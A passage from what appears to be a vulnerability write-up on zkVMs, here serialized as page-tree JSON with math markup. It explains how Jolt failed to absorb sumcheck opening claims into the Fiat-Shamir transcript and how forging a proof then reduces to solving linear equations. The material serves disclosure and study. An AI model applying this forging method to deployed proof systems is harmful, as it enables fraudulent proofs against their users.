4],{"type":27,"tag":207,"props":122295,"children":122297},{"className":122296,"ariaHidden":11278},[11277],[122298],{"type":27,"tag":207,"props":122299,"children":122301},{"className":122300},[11283],[122302,122307],{"type":27,"tag":207,"props":122303,"children":122306},{"className":122304,"style":122305},[11288],"height:0.8889em;vertical-align:-0.1944em;",[],{"type":27,"tag":207,"props":122308,"children":122310},{"className":122309,"style":102618},[11294,28860],[122311],{"type":33,"value":7596},{"type":33,"value":122313}," is linear: ",{"type":27,"tag":84,"props":122315,"children":122317},{"className":122316},[11266,11267],[122318],{"type":27,"tag":207,"props":122319,"children":122321},{"className":122320},[11272],[122322],{"type":27,"tag":207,"props":122323,"children":122325},{"className":122324,"ariaHidden":11278},[11277],[122326,122355,122382,122410],{"type":27,"tag":207,"props":122327,"children":122329},{"className":122328},[11283],[122330,122335,122342,122346,122351],{"type":27,"tag":207,"props":122331,"children":122334},{"className":122332,"style":122333},[11288],"height:0.4445em;",[],{"type":27,"tag":207,"props":122336,"children":122339},{"className":122337,"style":122338},[11294,28860],"margin-right:0.0037em;",[122340],{"type":33,"value":122341},"α",{"type":27,"tag":207,"props":122343,"children":122345},{"className":122344,"style":11373},[11372],[],{"type":27,"tag":207,"props":122347,"children":122349},{"className":122348},[11378],[122350],{"type":33,"value":118513},{"type":27,"tag":207,"props":122352,"children":122354},{"className":122353,"style":11373},[11372],[],{"type":27,"tag":207,"props":122356,"children":122358},{"className":122357},[11283],[122359,122364,122369,122373,122378],{"type":27,"tag":207,"props":122360,"children":122363},{"className":122361,"style":122362},[11288],"height:0.7667em;vertical-align:-0.0833em;",[],{"type":27,"tag":207,"props":122365,"children":122367},{"className":122366,"style":115449},[11294,28860],[122368],{"type":33,"value":115773},{"type":27,"tag":207,"props":122370,"children":122372},{"className":122371,"style":11373},[11372],[],{"type":27,"tag":207,"props":122374,"children":122376},{"className":122375},[11378],[122377],{"type":33,"value":2227},{"type":27,"tag":207,"props":122379,"children":122381},{"className":122380,"style":11373},[11372],[],{"type":27,"tag":207,"props":122383,"children":122385},{"className":122384},[11283],[122386,122390,122397,122401,122406],{"type":27,"tag":207,"props":122387,"children":122389},{"className":122388,"style":122305},[11288],[],{"type":27,"tag":207,"props":122391,"children":122394},{"className":122392,"style":122393},[11294,28860],"margin-right:0.05278em;",[122395],{"type":33,"value":122396},"β",{"type":27,"tag":207,"props":122398,"children":122400},{"className":122399,"style":11470},[11372],[],{"type":27,"tag":207,"props":122402,"children":122404},{"className":122403},[11475],[122405],{"type":33,"value":10380},{"type":27,"tag":207,"props":122407,"children":122409},{"className":122408,"style":11470},[11372],[],{"type":27,"tag":207,"props":122411,"children":122413},{"className":122412},[11283],[122414,122418],{"type":27,"tag":207,"props":122415,"children":122417},{"className":122416,"style":122271},[11288],[],{"type":27,"tag":207,"props":122419,"children":122421},{"className":122420},[11294,33],[122422],{"type":27,"tag":207,"props":122423,"children":122425},{"className":122424},[11294],[122426],{"type":33,"value":8941},{"type":27,"tag":1232,"props":122428,"children":122429},{},[122430,122432],{"type":33,"value":122431},"Solve: ",{"type":27,"tag":84,"props":122433,"children":122435},{"className":122434},[11266,11267],[122436],{"type":27,"tag":207,"props":122437,"children":122439},{"className":122438},[11272],[122440],{"type":27,"tag":207,"props":122441,"children":122443},{"className":122442,"ariaHidden":11278},[11277],[122444,122470,122505],{"type":27,"tag":207,"props":122445,"children":122447},{"className":122446},[11283],[122448,122452,122457,122461,122466],{"type":27,"tag":207,"props":122449,"children":122451},{"className":122450,"style":28855},[11288],[],{"type":27,"tag":207,"props":122453,"children":122455},{"className":122454,"style":115449},[11294,28860],[122456],{"type":33,"value":115773},{"type":27,"tag":207,"props":122458,"children":122460},{"className":122459,"style":11470},[11372],[],{"type":27,"tag":207,"props":122462,"children":122464},{"className":122463},[11475],[122465],{"type":33,"value":10380},{"type":27,"tag":207,"props":122467,"children":122469},{"className":122468,"style":11470},[11372],[],{"type":27,"tag":207,"props":122471,"children":122473},{"className":122472},[11283],[122474,122478,122483,122492,122496,122501],{"type":27,"tag":207,"props":122475,"children":122477},{"className":122476,"style":11393},[11288],[],{"type":27,"tag":207,"props":122479,"children":122481},{"className":122480},[28989],[122482],{"type":33,"value":1343},{"type":27,"tag":207,"props":122484,"children":122486},{"className":122485},[11294,33],[122487],{"type":27,"tag":207,"props":122488,"children":122490},{"className":122489},[11294],[122491],{"type":33,"value":8941},{"type":27,"tag":207,"props":122493,"children":122495},{"className":122494,"style":11373},[11372],[],{"type":27,"tag":207,"props":122497,"children":122499},{"className":122498},[11378],[122500],{"type":33,"value":11353},{"type":27,"tag":207,"props":122502,"children":122504},{"className":122503,"style":11373},[11372],[],{"type":27,"tag":207,"props":122506,"children":122508},{"className":122507},[11283],[122509,122513,122518,122523,122528],{"type":27,"tag":207,"props":122510,"children":122512},{"className":122511,"style":11393},[11288],[],{"type":27,"tag":207,"props":122514,"children":122516},{"className":122515,"style":122393},[11294,28860],[122517],{"type":33,"value":122396},{"type":27,"tag":207,"props":122519,"children":122521},{"className":122520},[29011],[122522],{"type":33,"value":10416},{"type":27,"tag":207,"props":122524,"children":122526},{"className":122525},[11294],[122527],{"type":33,"value":980},{"type":27,"tag":207,"props":122529,"children":122531},{"className":122530,"style":122338},[11294,28860],[122532],{"type":33,"value":122341},{"type":27,"tag":36,"props":122534,"children":122535},{},[122536],{"type":33,"value":122537},"In the simplest linear case, forging reduces to solving a low-dimensional field equation, while other systems require small coupled systems.",{"type":27,"tag":36,"props":122539,"children":122540},{},[122541,122543,122621],{"type":33,"value":122542},"For systems with multiple unbound values, we get a system of linear equations. Gaussian elimination solves it in ",{"type":27,"tag":84,"props":122544,"children":122546},{"className":122545},[11266,11267],[122547],{"type":27,"tag":207,"props":122548,"children":122550},{"className":122549},[11272],[122551],{"type":27,"tag":207,"props":122552,"children":122554},{"className":122553,"ariaHidden":11278},[11277],[122555],{"type":27,"tag":207,"props":122556,"children":122558},{"className":122557},[11283],[122559,122564,122570,122575,122616],{"type":27,"tag":207,"props":122560,"children":122563},{"className":122561,"style":122562},[11288],"height:1.0641em;vertical-align:-0.25em;",[],{"type":27,"tag":207,"props":122565,"children":122567},{"className":122566,"style":100264},[11294,28860],[122568],{"type":33,"value":122569},"O",{"type":27,"tag":207,"props":122571,"children":122573},{"className":122572},[28989],[122574],{"type":33,"value":1343},{"type":27,"tag":207,"props":122576,"children":122578},{"className":122577},[11294],[122579,122584],{"type":27,"tag":207,"props":122580,"children":122582},{"className":122581},[11294,28860],[122583],{"type":33,"value":63637},{"type":27,"tag":207,"props":122585,"children":122587},{"className":122586},[11309],[122588],{"type":27,"tag":207,"props":122589,"children":122591},{"className":122590},[11314],[122592],{"type":27,"tag":207,"props":122593,"children":122595},{"className":122594},[11319],[122596],{"type":27,"tag":207,"props":122597,"children":122599},{"className":122598,"style":11289},[11324],[122600],{"type":27,"tag":207,"props":122601,"children":122602},{"style":11328},[122603,122607],{"type":27,"tag":207,"props":122604,"children":122606},{"className":122605,"style":11334},[11333],[],{"type":27,"tag":207,"props":122608,"children":122610},{"className":122609},[11339,11340,11341,11342],[122611],{"type":27,"tag":207,"props":122612,"children":122614},{"className":122613},[11294,11342],[122615],{"type":33,"value":1735},{"type":27,"tag":207,"props":122617,"children":122619},{"className":122618},[29011],[122620],{"type":33,"value":10416},{"type":33,"value":122622}," field operations. For non-linear constraints, we might need to use some more advanced techniques like resultants and Groebner bases.",{"type":27,"tag":26063,"props":122624,"children":122625},{},[],{"type":27,"tag":28,"props":122627,"children":122629},{"id":122628},"the-six-broken-systems",[122630],{"type":33,"value":122631},"The Six Broken Systems",{"type":27,"tag":36,"props":122633,"children":122634},{},[122635],{"type":27,"tag":126,"props":122636,"children":122639},{"alt":122637,"src":122638},"3_six_broken_systems","/posts/zkvms-unfaithful-claims/3_six_broken_systems.svg",[],{"type":27,"tag":36,"props":122641,"children":122642},{},[122643],{"type":33,"value":122644},"Now let's see how this plays out in each system. We'll go deep on the first one (Jolt) to establish the pattern, then focus on what's unique about each subsequent system.",{"type":27,"tag":26063,"props":122646,"children":122647},{},[],{"type":27,"tag":58,"props":122649,"children":122651},{"id":122650},"jolt-a16z",[122652],{"type":33,"value":122653},"Jolt (a16z)",{"type":27,"tag":36,"props":122655,"children":122656},{},[122657],{"type":33,"value":122658},"Jolt is a zkVM for RISC-V programs, built by a16z. It uses sumcheck extensively to verify execution constraints.",{"type":27,"tag":36,"props":122660,"children":122661},{},[122662],{"type":27,"tag":12606,"props":122663,"children":122664},{},[122665],{"type":33,"value":122666},"The proof structure:",{"type":27,"tag":101,"props":122668,"children":122670},{"code":122669},"JoltProof {\n commitments: Vec\u003CCommitment>, // Polynomial commitments to trace\n opening_claims: Map\u003COpeningId, Claim>, // \u003C- THE VULNERABLE VALUES\n proofs: Map\u003CStage, SumcheckProof>, // Sumcheck and opening proofs\n ...\n}\n",[122671],{"type":27,"tag":84,"props":122672,"children":122673},{"__ignoreMap":7},[122674],{"type":33,"value":122669},{"type":27,"tag":36,"props":122676,"children":122677},{},[122678],{"type":27,"tag":12606,"props":122679,"children":122680},{},[122681],{"type":33,"value":122682},"The verification flow:",{"type":27,"tag":36,"props":122684,"children":122685},{},[122686],{"type":27,"tag":126,"props":122687,"children":122690},{"alt":122688,"src":122689},"4_jolt_verification_flow","/posts/zkvms-unfaithful-claims/4_jolt_verification_flow.svg",[],{"type":27,"tag":36,"props":122692,"children":122693},{},[122694,122699,122701,122707,122709,122715,122717,122722],{"type":27,"tag":12606,"props":122695,"children":122696},{},[122697],{"type":33,"value":122698},"The bug:",{"type":33,"value":122700}," Each sumcheck instance provides an ",{"type":27,"tag":84,"props":122702,"children":122704},{"className":122703},[],[122705],{"type":33,"value":122706},"input_claim",{"type":33,"value":122708},", which is the value the polynomial allegedly sums to over the Boolean hypercube. These claims come from ",{"type":27,"tag":84,"props":122710,"children":122712},{"className":122711},[],[122713],{"type":33,"value":122714},"opening_claims",{"type":33,"value":122716}," in the proof, but they were ",{"type":27,"tag":12606,"props":122718,"children":122719},{},[122720],{"type":33,"value":122721},"never absorbed into the transcript",{"type":33,"value":122723}," before the batching coefficients were derived.",{"type":27,"tag":36,"props":122725,"children":122726},{},[122727],{"type":27,"tag":126,"props":122728,"children":122731},{"alt":122729,"src":122730},"5_jolt_flow","/posts/zkvms-unfaithful-claims/5_jolt_flow.svg",[],{"type":27,"tag":36,"props":122733,"children":122734},{},[122735],{"type":27,"tag":12606,"props":122736,"children":122737},{},[122738],{"type":33,"value":122739},"How sumcheck uses opening_claims:",{"type":27,"tag":36,"props":122741,"children":122742},{},[122743,122745,122751,122753,122830],{"type":33,"value":122744},"In Jolt's batched sumcheck, the verifier computes a target value ",{"type":27,"tag":84,"props":122746,"children":122748},{"className":122747},[],[122749],{"type":33,"value":122750},"BatchedClaim",{"type":33,"value":122752}," by taking a random linear combination of the individual claims ",{"type":27,"tag":84,"props":122754,"children":122756},{"className":122755},[11266,11267],[122757],{"type":27,"tag":207,"props":122758,"children":122760},{"className":122759},[11272],[122761],{"type":27,"tag":207,"props":122762,"children":122764},{"className":122763,"ariaHidden":11278},[11277],[122765],{"type":27,"tag":207,"props":122766,"children":122768},{"className":122767},[11283],[122769,122773],{"type":27,"tag":207,"props":122770,"children":122772},{"className":122771,"style":118248},[11288],[],{"type":27,"tag":207,"props":122774,"children":122776},{"className":122775},[11294],[122777,122782],{"type":27,"tag":207,"props":122778,"children":122780},{"className":122779,"style":100498},[11294,28860],[122781],{"type":33,"value":100501},{"type":27,"tag":207,"props":122783,"children":122785},{"className":122784},[11309],[122786],{"type":27,"tag":207,"props":122787,"children":122789},{"className":122788},[11314,28914],[122790,122819],{"type":27,"tag":207,"props":122791,"children":122793},{"className":122792},[11319],[122794,122814],{"type":27,"tag":207,"props":122795,"children":122797},{"className":122796,"style":100793},[11324],[122798],{"type":27,"tag":207,"props":122799,"children":122800},{"style":117680},[122801,122805],{"type":27,"tag":207,"props":122802,"children":122804},{"className":122803,"style":11334},[11333],[],{"type":27,"tag":207,"props":122806,"children":122808},{"className":122807},[11339,11340,11341,11342],[122809],{"type":27,"tag":207,"props":122810,"children":122812},{"className":122811},[11294,28860,11342],[122813],{"type":33,"value":4690},{"type":27,"tag":207,"props":122815,"children":122817},{"className":122816},[29017],[122818],{"type":33,"value":29020},{"type":27,"tag":207,"props":122820,"children":122822},{"className":122821},[11319],[122823],{"type":27,"tag":207,"props":122824,"children":122826},{"className":122825,"style":100347},[11324],[122827],{"type":27,"tag":207,"props":122828,"children":122829},{},[],{"type":33,"value":736},{"type":27,"tag":36,"props":122832,"children":122833},{},[122834],{"type":27,"tag":84,"props":122835,"children":122837},{"className":122836},[11266,11267],[122838],{"type":27,"tag":207,"props":122839,"children":122841},{"className":122840},[11272],[122842],{"type":27,"tag":207,"props":122843,"children":122845},{"className":122844,"ariaHidden":11278},[11277],[122846,122876,123017],{"type":27,"tag":207,"props":122847,"children":122849},{"className":122848},[11283],[122850,122854,122863,122867,122872],{"type":27,"tag":207,"props":122851,"children":122853},{"className":122852,"style":100179},[11288],[],{"type":27,"tag":207,"props":122855,"children":122857},{"className":122856},[11294,33],[122858],{"type":27,"tag":207,"props":122859,"children":122861},{"className":122860},[11294],[122862],{"type":33,"value":122750},{"type":27,"tag":207,"props":122864,"children":122866},{"className":122865,"style":11470},[11372],[],{"type":27,"tag":207,"props":122868,"children":122870},{"className":122869},[11475],[122871],{"type":33,"value":10380},{"type":27,"tag":207,"props":122873,"children":122875},{"className":122874,"style":11470},[11372],[],{"type":27,"tag":207,"props":122877,"children":122879},{"className":122878},[11283],[122880,122885,122942,122946,123004,123008,123013],{"type":27,"tag":207,"props":122881,"children":122884},{"className":122882,"style":122883},[11288],"height:1.0497em;vertical-align:-0.2997em;",[],{"type":27,"tag":207,"props":122886,"children":122888},{"className":122887},[28896],[122889,122894],{"type":27,"tag":207,"props":122890,"children":122892},{"className":122891,"style":28903},[28896,28901,28902],[122893],{"type":33,"value":116046},{"type":27,"tag":207,"props":122895,"children":122897},{"className":122896},[11309],[122898],{"type":27,"tag":207,"props":122899,"children":122901},{"className":122900},[11314,28914],[122902,122931],{"type":27,"tag":207,"props":122903,"children":122905},{"className":122904},[11319],[122906,122926],{"type":27,"tag":207,"props":122907,"children":122909},{"className":122908,"style":121458},[11324],[122910],{"type":27,"tag":207,"props":122911,"children":122912},{"style":28927},[122913,122917],{"type":27,"tag":207,"props":122914,"children":122916},{"className":122915,"style":11334},[11333],[],{"type":27,"tag":207,"props":122918,"children":122920},{"className":122919},[11339,11340,11341,11342],[122921],{"type":27,"tag":207,"props":122922,"children":122924},{"className":122923},[11294,28860,11342],[122925],{"type":33,"value":4690},{"type":27,"tag":207,"props":122927,"children":122929},{"className":122928},[29017],[122930],{"type":33,"value":29020},{"type":27,"tag":207,"props":122932,"children":122934},{"className":122933},[11319],[122935],{"type":27,"tag":207,"props":122936,"children":122938},{"className":122937,"style":121738},[11324],[122939],{"type":27,"tag":207,"props":122940,"children":122941},{},[],{"type":27,"tag":207,"props":122943,"children":122945},{"className":122944,"style":11411},[11372],[],{"type":27,"tag":207,"props":122947,"children":122949},{"className":122948},[11294],[122950,122955],{"type":27,"tag":207,"props":122951,"children":122953},{"className":122952,"style":122338},[11294,28860],[122954],{"type":33,"value":122341},{"type":27,"tag":207,"props":122956,"children":122958},{"className":122957},[11309],[122959],{"type":27,"tag":207,"props":122960,"children":122962},{"className":122961},[11314,28914],[122963,122993],{"type":27,"tag":207,"props":122964,"children":122966},{"className":122965},[11319],[122967,122988],{"type":27,"tag":207,"props":122968,"children":122970},{"className":122969,"style":100793},[11324],[122971],{"type":27,"tag":207,"props":122972,"children":122974},{"style":122973},"top:-2.55em;margin-left:-0.0037em;margin-right:0.05em;",[122975,122979],{"type":27,"tag":207,"props":122976,"children":122978},{"className":122977,"style":11334},[11333],[],{"type":27,"tag":207,"props":122980,"children":122982},{"className":122981},[11339,11340,11341,11342],[122983],{"type":27,"tag":207,"props":122984,"children":122986},{"className":122985},[11294,28860,11342],[122987],{"type":33,"value":4690},{"type":27,"tag":207,"props":122989,"children":122991},{"className":122990},[29017],[122992],{"type":33,"value":29020},{"type":27,"tag":207,"props":122994,"children":122996},{"className":122995},[11319],[122997],{"type":27,"tag":207,"props":122998,"children":123000},{"className":122999,"style":100347},[11324],[123001],{"type":27,"tag":207,"props":123002,"children":123003},{},[],{"type":27,"tag":207,"props":123005,"children":123007},{"className":123006,"style":11373},[11372],[],{"type":27,"tag":207,"props":123009,"children":123011},{"className":123010},[11378],[123012],{"type":33,"value":118513},{"type":27,"tag":207,"props":123014,"children":123016},{"className":123015,"style":11373},[11372],[],{"type":27,"tag":207,"props":123018,"children":123020},{"className":123019},[11283],[123021,123025],{"type":27,"tag":207,"props":123022,"children":123024},{"className":123023,"style":118248},[11288],[],{"type":27,"tag":207,"props":123026,"children":123028},{"className":123027},[11294],[123029,123034],{"type":27,"tag":207,"props":123030,"children":123032},{"className":123031,"style":100498},[11294,28860],[123033],{"type":33,"value":100501},{"type":27,"tag":207,"props":123035,"children":123037},{"className":123036},[11309],[123038],{"type":27,"tag":207,"props":123039,"children":123041},{"className":123040},[11314,28914],[123042,123071],{"type":27,"tag":207,"props":123043,"children":123045},{"className":123044},[11319],[123046,123066],{"type":27,"tag":207,"props":123047,"children":123049},{"className":123048,"style":100793},[11324],[123050],{"type":27,"tag":207,"props":123051,"children":123052},{"style":117680},[123053,123057],{"type":27,"tag":207,"props":123054,"children":123056},{"className":123055,"style":11334},[11333],[],{"type":27,"tag":207,"props":123058,"children":123060},{"className":123059},[11339,11340,11341,11342],[123061],{"type":27,"tag":207,"props":123062,"children":123064},{"className":123063},[11294,28860,11342],[123065],{"type":33,"value":4690},{"type":27,"tag":207,"props":123067,"children":123069},{"className":123068},[29017],[123070],{"type":33,"value":29020},{"type":27,"tag":207,"props":123072,"children":123074},{"className":123073},[11319],[123075],{"type":27,"tag":207,"props":123076,"children":123078},{"className":123077,"style":100347},[11324],[123079],{"type":27,"tag":207,"props":123080,"children":123081},{},[],{"type":27,"tag":36,"props":123083,"children":123084},{},[123085,123087,123164,123166,123171,123173,123250,123252,123329,123331,123408],{"type":33,"value":123086},"where ",{"type":27,"tag":84,"props":123088,"children":123090},{"className":123089},[11266,11267],[123091],{"type":27,"tag":207,"props":123092,"children":123094},{"className":123093},[11272],[123095],{"type":27,"tag":207,"props":123096,"children":123098},{"className":123097,"ariaHidden":11278},[11277],[123099],{"type":27,"tag":207,"props":123100,"children":123102},{"className":123101},[11283],[123103,123107],{"type":27,"tag":207,"props":123104,"children":123106},{"className":123105,"style":117221},[11288],[],{"type":27,"tag":207,"props":123108,"children":123110},{"className":123109},[11294],[123111,123116],{"type":27,"tag":207,"props":123112,"children":123114},{"className":123113,"style":122338},[11294,28860],[123115],{"type":33,"value":122341},{"type":27,"tag":207,"props":123117,"children":123119},{"className":123118},[11309],[123120],{"type":27,"tag":207,"props":123121,"children":123123},{"className":123122},[11314,28914],[123124,123153],{"type":27,"tag":207,"props":123125,"children":123127},{"className":123126},[11319],[123128,123148],{"type":27,"tag":207,"props":123129,"children":123131},{"className":123130,"style":100793},[11324],[123132],{"type":27,"tag":207,"props":123133,"children":123134},{"style":122973},[123135,123139],{"type":27,"tag":207,"props":123136,"children":123138},{"className":123137,"style":11334},[11333],[],{"type":27,"tag":207,"props":123140,"children":123142},{"className":123141},[11339,11340,11341,11342],[123143],{"type":27,"tag":207,"props":123144,"children":123146},{"className":123145},[11294,28860,11342],[123147],{"type":33,"value":4690},{"type":27,"tag":207,"props":123149,"children":123151},{"className":123150},[29017],[123152],{"type":33,"value":29020},{"type":27,"tag":207,"props":123154,"children":123156},{"className":123155},[11319],[123157],{"type":27,"tag":207,"props":123158,"children":123160},{"className":123159,"style":100347},[11324],[123161],{"type":27,"tag":207,"props":123162,"children":123163},{},[],{"type":33,"value":123165}," are random coefficients derived from the transcript. Since ",{"type":27,"tag":84,"props":123167,"children":123169},{"className":123168},[],[123170],{"type":33,"value":122714},{"type":33,"value":123172}," (containing ",{"type":27,"tag":84,"props":123174,"children":123176},{"className":123175},[11266,11267],[123177],{"type":27,"tag":207,"props":123178,"children":123180},{"className":123179},[11272],[123181],{"type":27,"tag":207,"props":123182,"children":123184},{"className":123183,"ariaHidden":11278},[11277],[123185],{"type":27,"tag":207,"props":123186,"children":123188},{"className":123187},[11283],[123189,123193],{"type":27,"tag":207,"props":123190,"children":123192},{"className":123191,"style":118248},[11288],[],{"type":27,"tag":207,"props":123194,"children":123196},{"className":123195},[11294],[123197,123202],{"type":27,"tag":207,"props":123198,"children":123200},{"className":123199,"style":100498},[11294,28860],[123201],{"type":33,"value":100501},{"type":27,"tag":207,"props":123203,"children":123205},{"className":123204},[11309],[123206],{"type":27,"tag":207,"props":123207,"children":123209},{"className":123208},[11314,28914],[123210,123239],{"type":27,"tag":207,"props":123211,"children":123213},{"className":123212},[11319],[123214,123234],{"type":27,"tag":207,"props":123215,"children":123217},{"className":123216,"style":100793},[11324],[123218],{"type":27,"tag":207,"props":123219,"children":123220},{"style":117680},[123221,123225],{"type":27,"tag":207,"props":123222,"children":123224},{"className":123223,"style":11334},[11333],[],{"type":27,"tag":207,"props":123226,"children":123228},{"className":123227},[11339,11340,11341,11342],[123229],{"type":27,"tag":207,"props":123230,"children":123232},{"className":123231},[11294,28860,11342],[123233],{"type":33,"value":4690},{"type":27,"tag":207,"props":123235,"children":123237},{"className":123236},[29017],[123238],{"type":33,"value":29020},{"type":27,"tag":207,"props":123240,"children":123242},{"className":123241},[11319],[123243],{"type":27,"tag":207,"props":123244,"children":123246},{"className":123245,"style":100347},[11324],[123247],{"type":27,"tag":207,"props":123248,"children":123249},{},[],{"type":33,"value":123251},") were not in the transcript, the ",{"type":27,"tag":84,"props":123253,"children":123255},{"className":123254},[11266,11267],[123256],{"type":27,"tag":207,"props":123257,"children":123259},{"className":123258},[11272],[123260],{"type":27,"tag":207,"props":123261,"children":123263},{"className":123262,"ariaHidden":11278},[11277],[123264],{"type":27,"tag":207,"props":123265,"children":123267},{"className":123266},[11283],[123268,123272],{"type":27,"tag":207,"props":123269,"children":123271},{"className":123270,"style":117221},[11288],[],{"type":27,"tag":207,"props":123273,"children":123275},{"className":123274},[11294],[123276,123281],{"type":27,"tag":207,"props":123277,"children":123279},{"className":123278,"style":122338},[11294,28860],[123280],{"type":33,"value":122341},{"type":27,"tag":207,"props":123282,"children":123284},{"className":123283},[11309],[123285],{"type":27,"tag":207,"props":123286,"children":123288},{"className":123287},[11314,28914],[123289,123318],{"type":27,"tag":207,"props":123290,"children":123292},{"className":123291},[11319],[123293,123313],{"type":27,"tag":207,"props":123294,"children":123296},{"className":123295,"style":100793},[11324],[123297],{"type":27,"tag":207,"props":123298,"children":123299},{"style":122973},[123300,123304],{"type":27,"tag":207,"props":123301,"children":123303},{"className":123302,"style":11334},[11333],[],{"type":27,"tag":207,"props":123305,"children":123307},{"className":123306},[11339,11340,11341,11342],[123308],{"type":27,"tag":207,"props":123309,"children":123311},{"className":123310},[11294,28860,11342],[123312],{"type":33,"value":4690},{"type":27,"tag":207,"props":123314,"children":123316},{"className":123315},[29017],[123317],{"type":33,"value":29020},{"type":27,"tag":207,"props":123319,"children":123321},{"className":123320},[11319],[123322],{"type":27,"tag":207,"props":123323,"children":123325},{"className":123324,"style":100347},[11324],[123326],{"type":27,"tag":207,"props":123327,"children":123328},{},[],{"type":33,"value":123330}," values are independent of ",{"type":27,"tag":84,"props":123332,"children":123334},{"className":123333},[11266,11267],[123335],{"type":27,"tag":207,"props":123336,"children":123338},{"className":123337},[11272],[123339],{"type":27,"tag":207,"props":123340,"children":123342},{"className":123341,"ariaHidden":11278},[11277],[123343],{"type":27,"tag":207,"props":123344,"children":123346},{"className":123345},[11283],[123347,123351],{"type":27,"tag":207,"props":123348,"children":123350},{"className":123349,"style":118248},[11288],[],{"type":27,"tag":207,"props":123352,"children":123354},{"className":123353},[11294],[123355,123360],{"type":27,"tag":207,"props":123356,"children":123358},{"className":123357,"style":100498},[11294,28860],[123359],{"type":33,"value":100501},{"type":27,"tag":207,"props":123361,"children":123363},{"className":123362},[11309],[123364],{"type":27,"tag":207,"props":123365,"children":123367},{"className":123366},[11314,28914],[123368,123397],{"type":27,"tag":207,"props":123369,"children":123371},{"className":123370},[11319],[123372,123392],{"type":27,"tag":207,"props":123373,"children":123375},{"className":123374,"style":100793},[11324],[123376],{"type":27,"tag":207,"props":123377,"children":123378},{"style":117680},[123379,123383],{"type":27,"tag":207,"props":123380,"children":123382},{"className":123381,"style":11334},[11333],[],{"type":27,"tag":207,"props":123384,"children":123386},{"className":123385},[11339,11340,11341,11342],[123387],{"type":27,"tag":207,"props":123388,"children":123390},{"className":123389},[11294,28860,11342],[123391],{"type":33,"value":4690},{"type":27,"tag":207,"props":123393,"children":123395},{"className":123394},[29017],[123396],{"type":33,"value":29020},{"type":27,"tag":207,"props":123398,"children":123400},{"className":123399},[11319],[123401],{"type":27,"tag":207,"props":123402,"children":123404},{"className":123403,"style":100347},[11324],[123405],{"type":27,"tag":207,"props":123406,"children":123407},{},[],{"type":33,"value":1041},{"type":27,"tag":36,"props":123410,"children":123411},{},[123412],{"type":27,"tag":12606,"props":123413,"children":123414},{},[123415],{"type":33,"value":123416},"Why it's linear:",{"type":27,"tag":36,"props":123418,"children":123419},{},[123420,123422],{"type":33,"value":123421},"Due to the compression optimization (prover omits one less coefficient per round), the final verification equation traces back through the rounds and becomes linear in the input claim ",{"type":27,"tag":84,"props":123423,"children":123425},{"className":123424},[11266,11267],[123426],{"type":27,"tag":207,"props":123427,"children":123429},{"className":123428},[11272],[123430],{"type":27,"tag":207,"props":123431,"children":123433},{"className":123432,"ariaHidden":11278},[11277],[123434],{"type":27,"tag":207,"props":123435,"children":123437},{"className":123436},[11283],[123438,123442],{"type":27,"tag":207,"props":123439,"children":123441},{"className":123440,"style":28855},[11288],[],{"type":27,"tag":207,"props":123443,"children":123445},{"className":123444,"style":100498},[11294,28860],[123446],{"type":33,"value":100501},{"type":27,"tag":36,"props":123448,"children":123449},{},[123450],{"type":27,"tag":84,"props":123451,"children":123453},{"className":123452},[11266,11267],[123454],{"type":27,"tag":207,"props":123455,"children":123457},{"className":123456},[11272],[123458],{"type":27,"tag":207,"props":123459,"children":123461},{"className":123460,"ariaHidden":11278},[11277],[123462,123552,123578,123604],{"type":27,"tag":207,"props":123463,"children":123465},{"className":123464},[11283],[123466,123470,123539,123543,123548],{"type":27,"tag":207,"props":123467,"children":123469},{"className":123468,"style":118248},[11288],[],{"type":27,"tag":207,"props":123471,"children":123473},{"className":123472},[11294],[123474,123480],{"type":27,"tag":207,"props":123475,"children":123477},{"className":123476,"style":29392},[11294,28860],[123478],{"type":33,"value":123479},"C",{"type":27,"tag":207,"props":123481,"children":123483},{"className":123482},[11309],[123484],{"type":27,"tag":207,"props":123485,"children":123487},{"className":123486},[11314,28914],[123488,123528],{"type":27,"tag":207,"props":123489,"children":123491},{"className":123490},[11319],[123492,123523],{"type":27,"tag":207,"props":123493,"children":123496},{"className":123494,"style":123495},[11324],"height:0.3361em;",[123497],{"type":27,"tag":207,"props":123498,"children":123500},{"style":123499},"top:-2.55em;margin-left:-0.0715em;margin-right:0.05em;",[123501,123505],{"type":27,"tag":207,"props":123502,"children":123504},{"className":123503,"style":11334},[11333],[],{"type":27,"tag":207,"props":123506,"children":123508},{"className":123507},[11339,11340,11341,11342],[123509],{"type":27,"tag":207,"props":123510,"children":123512},{"className":123511},[11294,11342],[123513],{"type":27,"tag":207,"props":123514,"children":123516},{"className":123515},[11294,33,11342],[123517],{"type":27,"tag":207,"props":123518,"children":123520},{"className":123519},[11294,11342],[123521],{"type":33,"value":123522},"final",{"type":27,"tag":207,"props":123524,"children":123526},{"className":123525},[29017],[123527],{"type":33,"value":29020},{"type":27,"tag":207,"props":123529,"children":123531},{"className":123530},[11319],[123532],{"type":27,"tag":207,"props":123533,"children":123535},{"className":123534,"style":100347},[11324],[123536],{"type":27,"tag":207,"props":123537,"children":123538},{},[],{"type":27,"tag":207,"props":123540,"children":123542},{"className":123541,"style":11470},[11372],[],{"type":27,"tag":207,"props":123544,"children":123546},{"className":123545},[11475],[123547],{"type":33,"value":10380},{"type":27,"tag":207,"props":123549,"children":123551},{"className":123550,"style":11470},[11372],[],{"type":27,"tag":207,"props":123553,"children":123555},{"className":123554},[11283],[123556,123560,123565,123569,123574],{"type":27,"tag":207,"props":123557,"children":123559},{"className":123558,"style":122333},[11288],[],{"type":27,"tag":207,"props":123561,"children":123563},{"className":123562},[11294,28860],[123564],{"type":33,"value":47},{"type":27,"tag":207,"props":123566,"children":123568},{"className":123567,"style":11373},[11372],[],{"type":27,"tag":207,"props":123570,"children":123572},{"className":123571},[11378],[123573],{"type":33,"value":118513},{"type":27,"tag":207,"props":123575,"children":123577},{"className":123576,"style":11373},[11372],[],{"type":27,"tag":207,"props":123579,"children":123581},{"className":123580},[11283],[123582,123586,123591,123595,123600],{"type":27,"tag":207,"props":123583,"children":123585},{"className":123584,"style":122362},[11288],[],{"type":27,"tag":207,"props":123587,"children":123589},{"className":123588,"style":100498},[11294,28860],[123590],{"type":33,"value":100501},{"type":27,"tag":207,"props":123592,"children":123594},{"className":123593,"style":11373},[11372],[],{"type":27,"tag":207,"props":123596,"children":123598},{"className":123597},[11378],[123599],{"type":33,"value":2227},{"type":27,"tag":207,"props":123601,"children":123603},{"className":123602,"style":11373},[11372],[],{"type":27,"tag":207,"props":123605,"children":123607},{"className":123606},[11283],[123608,123612],{"type":27,"tag":207,"props":123609,"children":123611},{"className":123610,"style":100179},[11288],[],{"type":27,"tag":207,"props":123613,"children":123615},{"className":123614},[11294,28860],[